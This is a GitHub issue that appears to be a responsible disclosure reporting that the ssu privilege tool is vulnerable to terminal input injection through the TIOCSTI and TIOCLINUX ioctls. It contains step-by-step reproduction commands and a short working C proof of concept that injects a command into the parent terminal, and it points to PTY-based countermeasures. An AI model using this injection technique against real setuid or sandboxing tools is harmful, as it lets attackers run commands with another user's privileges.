Open
Description
Hi!
I believe that ssu is vulnerabily to privilege escalation using ioctls TIOCSTI
and TIOCLINUX
. Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://github.com/illiliti/ssu
$ cd ssu/
$ git rev-parse HEAD # 606a96b542bb16bd1f4c20058477994f75186fc9
$ make
$ sudo chown root:root ./ssu
$ sudo chmod u+s ./ssu
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./ssu -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
- This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
- ttyjack allows playing with
TIOCSTI
andTIOCLINUX
comfortably. - Of the three known options for counter measures, use of a PTY is currently considered the best solution.
- For a list of other software known affected by this issue please see https://github.com/hartwork/antijack#related-cves-not-mine .
- The code above is inspired by CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl containers/bubblewrap#142 .
Best, Sebastian
Metadata
Metadata
Assignees
Labels
No labels